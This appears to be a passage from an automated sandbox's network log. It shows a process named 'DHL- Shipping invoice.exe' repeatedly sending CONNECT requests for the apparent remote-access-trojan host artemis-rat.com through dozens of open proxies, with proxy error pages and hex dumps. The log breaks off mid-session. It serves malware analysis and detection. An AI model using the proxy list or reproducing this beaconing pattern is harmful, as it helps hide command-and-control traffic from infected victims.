                            Mar 12, 2024 08:38:20.374883890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:08.531146049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1956192.168.2.45169951.158.98.211163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.990171909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.140603065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.250356913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.250535965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.343594074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:44.343558073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:56.359344006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:20.374874115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:08.531142950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1957192.168.2.45557961.178.152.3173026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.991986990 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:08.330225945 CET90INHTTP/1.1 200 OK
                            Content-Type: application/json
                            Connection: close
                            Content-Length: 55


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1958192.168.2.45559074.119.147.20941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.992177010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1959192.168.2.45530037.187.77.58144706484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.996618032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453291893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.859596968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1960192.168.2.451677190.97.238.889996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.996769905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.114905119 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1961192.168.2.454006192.163.201.13188966484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.997461081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.065954924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.062968969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1962192.168.2.45161493.42.151.10080806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.000638008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.860590935 CET202INHTTP/1.0 403 Forbidden
                            Content-Length: 704
                            Content-Type: text/html
                            Date: Tue, 12 Mar 2024 07:37:08 GMT
                            Expires: Tue, 12 Mar 2024 07:37:08 GMT
                            Server: Mikrotik HttpProxy
                            Proxy-Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1963192.168.2.455581143.64.8.2180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.000710964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1964192.168.2.45524151.68.164.77545046484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.004897118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.065973997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.063071012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.063183069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.062264919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:44.062284946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:56.062283993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:20.062299967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:08.062278032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1965192.168.2.455592195.138.65.3456786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.010046959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1966192.168.2.45559195.71.124.18756786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.019514084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1967192.168.2.455594147.75.34.86100006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.029279947 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:08.193830013 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1968192.168.2.455596142.4.123.41806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.031120062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1969192.168.2.451685125.141.139.6055666484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.031775951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:38.363348961 CET755INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 54 6f 72 20 61 73 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 6f 72 20 69 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 21 2d 2d 20 50 6c 75 73 20 74 68 69 73 20 63 6f 6d 6d 65 6e 74 2c 20 74 6f 20 6d 61 6b 65 20 74 68 65 20 62 6f 64 79 20 72 65 73 70 6f 6e 73 65 20 6d 6f 72 65 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 73 6f 20 20 20 20 20 20 49 45 20 77 69 6c 6c 20 62 65 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 70 6c 61 79 20 69 74 2e 20 43 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 20 20 20 20 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 2e 2d 2d 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                            Data Ascii: <html><head><title>Tor is not an HTTP Proxy</title></head><body><h1>Tor is not an HTTP Proxy</h1><p>It appears you have configured your web browser to use Tor as an HTTP proxy.This is not correct: Tor is a SOCKS proxy, not an HTTP proxy.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.... Plus this comment, to make the body response more than 512 bytes, so IE will be willing to display it. Comment comment comment comment comment comment comment comment comment comment comment comment.--></p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1970192.168.2.455595184.185.2.1241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.055968046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1971192.168.2.455583203.95.196.580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.068032980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1972192.168.2.455314115.89.203.59806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.070019960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.249778986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.265789986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.359590054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.562271118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:44.562309980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:56.562295914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:20.562531948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1973192.168.2.455584203.95.198.14680806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.075968981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.433984995 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:37:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1974192.168.2.45547345.61.188.134444996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.078193903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1975192.168.2.455593110.12.211.140806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.085510969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1976192.168.2.451649138.2.73.15710806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.086379051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1977192.168.2.454096208.87.131.240413686484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.118566036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.563245058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1978192.168.2.455582103.231.45.14510806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.132153988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1979192.168.2.451622132.148.245.247603496484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.132415056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.140784025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.250377893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.250564098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1980192.168.2.455437207.180.198.241558236484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.134175062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
